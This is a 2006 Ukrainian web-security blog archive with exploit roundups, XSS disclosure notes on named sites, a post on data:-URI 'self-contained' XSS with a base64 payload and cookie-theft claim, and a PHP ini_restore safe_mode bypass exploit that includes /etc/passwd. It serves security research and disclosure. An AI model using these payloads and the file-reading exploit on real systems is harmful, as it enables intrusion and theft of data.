Архів за Вересень, 2006

Добірка експлоітів

17:29 30.09.2006

В даній добірці експлоіти в веб додатках:

  • Downstat <= 1.8 (art) Remote File Include Vulnerability (деталі)
  • TeamCal Pro <= 2.8.001 (app_root) Remote file Include Vulnerability (деталі)
  • Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability (деталі)
  • phpQuiz 0.1 (pagename) Remote File Include Vulnerability (деталі)
  • RaidenHTTPD/1.1.49 remote commands execution exploit (деталі)

Уразливості на myshop-in.net, mynews-in.net та mysearch-in.net

17:10 30.09.2006

13.09.2006

На початку минулого місяця, я знайшов Cross-Site Scripting уразливості на різних проектах topping: http://www.myshop-in.net, http://search.mynews-in.net та http://catalog.mysearch-in.net. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

Я вже раніше писав про уразливість на topping.com.ua, яку так й досі не виправили.

30.09.2006

XSS:

Уразливості досі не виправлені.

MustLive Perl Pascal Programs Interpreter

15:49 30.09.2006

Сьогодні вийшла нова версія програми Perl Pas Interpreter v.1.2.7. В новій версії:

  • Додана кнопка очищення поля текста програми (в онлайн інтерпретаторі).
  • Додана функція delete.
  • Додана функція insert.
  • Покращена робота read та readln з масивами (з індексом-змінною).

Деталі на сайті інтерпретатора. Тема для обговорення програми на форумі.

Додаткова інформація про Perl Pas Interpreter в розділі Онлайн інструменти.

Самодостатній Cross-Site Scripting

20:33 29.09.2006

Про Cross-Site Scripting я згадував чимало на своєму сайті - це взагалі одна із головних тем, які я піднімаю. І до цього часу мова йшла лише про класичний XSS, назвемо його так (причому класичний Cross-Site Scripting в свою чергу ділиться на декілька різновидів), щоб відрізняти від нового різновида XSS. Про який я зараз вам розповім, який по суті є лише ще одним підкласом XSS уразливостей. Мова йде про самодостатній XSS (self-contained XSS).

Самодостатній Cross-Site Scripting - це зовсім інша форма XSS уразливостей, яка має свої обмеження з одного боку, а з іншого - її набагато важче виявити і відфільтрувати (на даний час). Тому що старі методи, які фільтрують класичний XSS, вже не діють.

Як повідомив pdp, 22.09.2006, в своій статті Self-contained XSS Attacks, він виявив дану уразливість - нову форму XSS атак. На що потім в коментарях до статті, RSnake написав, що в нього даний вектор атаки XSS вже згадувався 2 роки тому (і приклад самодостатньої XSS атаки в нього на сайті приводиться, якщо уважно прочитати відповідні матеріали). Тобто це не є новим вектором атаки. Але справа не в цьому, бо все нове - це добре забуте старе. Зараз як раз з новими силами і більш доступно pdp, а тепер і я, розповідаємо про даний різновид XSS атак.

Для впровадження атаки з самодостатнім XSS використовується протокол data.

Даний ява скрипт код:

<script>alert("XSS")</script>

Має наступний вигляд:
data:text/html;base64,PHNjcmlwdD4KYWxlcnQoIlhTUyIpOwo8L3NjcmlwdD4=

Для перетворення довільного коду (для XSS) в потрібний формат для протоколу data потрібен перекодувач в Base64 формат даних (з відповідним заголовком). Для цього я пропоную для вас Онлайновий генератор самодостатніх XSS. Який і займеться генерацією потрібного XSS кода. В Генераторі XSS в формі ви можете сгенерувати html код, який можна одразу ж виконати (для перевірки).

Слід додати, що сам pdp, автор статті (а також RSnake в коментярях), заявляють, що для викрадення кукісів даний метод не придатний. Що тільки для інших векторів атаки можна застосовувати цей мотод самодостатніх XSS. На що я не можу з ними погодитися. Я провів необхідні тестування, і alert(document.cookie) працює добре. Тому при правильному підході, все буде працювати як потрібно (потрібно не просто в URL вписати, а розмістити в лінці в атибуті href). Тому даний вектор атаки є доволі небезпечним.

Лише потрібно зазначити, що його використання обмежене. Ця уразливість може бути експлуатована в Mozilla, Firefox, Opera і можливо інших браузерах. Internet Explorer 6 і 7 не дозволить зробити атаку даного типу (бо не підтримує протокол data).

P.S.

До речі, окрім статті автора, Self-contained XSS Attacks (на англійскій), також можете прочитати переклад цієї статті на секлабі Самодостаточные XSS атаки.

Добірка експлоітів

19:06 29.09.2006

В даній добірці експлоіти в веб додатках:

  • phpunity.postcard (gallery_path) Remote File Include Vulnerability (деталі)
  • Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability (деталі)
  • TualBLOG 1.0 (icerikno) Remote SQL Injection Vulnerability (деталі)
  • Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability (деталі)
  • Exploits phpBB poison NULL byte with avatar (деталі)

gnucitizen.org - блог про веб безпеку

17:16 29.09.2006

Давно вже планував розповісти про один цікавий веб сайт (блог) на тему веб безпеки: http://www.gnucitizen.org - GNUCITIZEN.

Рекомендую ознайомитися з даним блогом всім, кто ціватиться темою веб безпеки.

Я ще окремо розповім більш детально про безліч різних тем, пов’язаних з веб безпекою, які піднімає автор блога.

Останні п’ять цікавих тем:

Добірка уразливостей

16:48 29.09.2006

В даній добірці уразливості в веб додатках:

  • Newsscript <= 0.5 Remote and Local File Include Vulnerability (деталі)
  • DCP-Portal SE 6.0 multiple injections (деталі)
  • ADOdb Date Library Full path Bugs (деталі)
  • Tagger LE PHP “eval()” Injection Vulnerabilities (деталі)
  • ForumJBC v4 < = Cross-Site Scripting - XSS Exploit (деталі)
  • PHP Event Calendar Multiple Parameter Cross Site Scripting Vulnerability (деталі)
  • Snitz Forums 2000 v3.4.06 (деталі)
  • TualBLOG v 1.0 multiple sql injection (деталі)
  • Міжсайтовий скриптінг в AWBS (деталі)
  • RateIt SQL Injection Vulnerability (деталі)

Обхід обмежень безпеки в PHP

21:15 28.09.2006

Можливий обхід обмежень безпеки в PHP.

Уразливі версії: PHP <= 4.4.4, PHP <= 5.1.6.

Уразливість дозволяє віддаленому користувачу одержати доступ до важливих даних в системі.

Уразливість існує через недостатнє обмеження на зміну параметрів safe_mode і open_basedir у функції ini_restore(). Якщо ці обмеження встановлені в настроюваннях віртуального хоста веб сервера, а у файлі php.ini знаходяться значення за замовчуванням, зловмисник може відновити значення за замовчуванням і обійти обмеження, встановлені у конфігураційному файлі web сервера.

Приклад уразливої конфігурації:
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>

Експлоіт:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>

Вдала експлуатація уразливості дозволить зловмиснику одержати доступ до вмісту довільних файлів даної системи.

Додаткова інформація:

  • Обхід захисту PHP Safe Mode (деталі)
  • Обход ограничений безопасности в PHP (деталі)

Уразливість на ain.com.ua

20:10 28.09.2006

17.09.2006

В минулому місяці, 24.08.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://ain.com.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.09.2006

XSS:

Хоча адміністрація AIN підтвердила отримання детальної інформації від мене, уразливості досі не виправлені.

Добірка експлоітів

17:37 28.09.2006

В даній добірці експлоіти в веб додатках:

  • phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability (деталі)
  • phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit (деталі)
  • PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities (деталі)
  • WTools 0.0.1a (include_path) Remote File Include Vulnerability (деталі)
  • Exploits PhpLinkExchange v1.0 RC (деталі)